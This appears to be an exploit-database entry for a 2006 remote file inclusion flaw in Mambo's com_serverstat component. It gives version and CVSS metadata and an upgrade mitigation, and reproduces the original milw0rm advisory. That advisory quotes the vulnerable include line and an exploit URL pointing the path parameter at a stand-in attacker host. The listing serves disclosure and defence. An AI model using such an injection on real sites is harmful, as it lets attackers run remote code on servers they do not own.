header-logo
Suggest Exploit
vendor:
Mambo
by:
xoron (turkish hacker)
8,8
CVSS
HIGH
Remote File Include
98
CWE
Product Name: Mambo
Affected Version From: 0.4.4
Affected Version To: 0.4.4
Patch Exists: YES
Related CWE: N/A
CPE: a:mambo:mambo:0.4.4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Mambo com_serverstat Component <=0.4.4 Remote File Include Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input in the 'mosConfig_absolute_path' parameter in the 'install.serverstat.php' script. This can be exploited to include arbitrary files from remote hosts.

Mitigation:

Upgrade to version 0.4.5 or later.
Source

Exploit-DB raw data:

=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
+
+Mambo com_serverstat Component <=0.4.4 Remote File Include Vulnerability
+
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
+
+Author: xoron (turkish hacker)
+
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
+
+Class : Remote
+
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
+
+Vuln Code: require_once($mosConfig_absolute_path."/administrator/components/com_serverstat/config.serverstat.php");
+
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
+
+Exploit: administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://evil_scripts?
+
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
+
Thanx : str0ke, Ironfist, Preddy, SHiKaA
+
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=

# milw0rm.com [2006-09-14]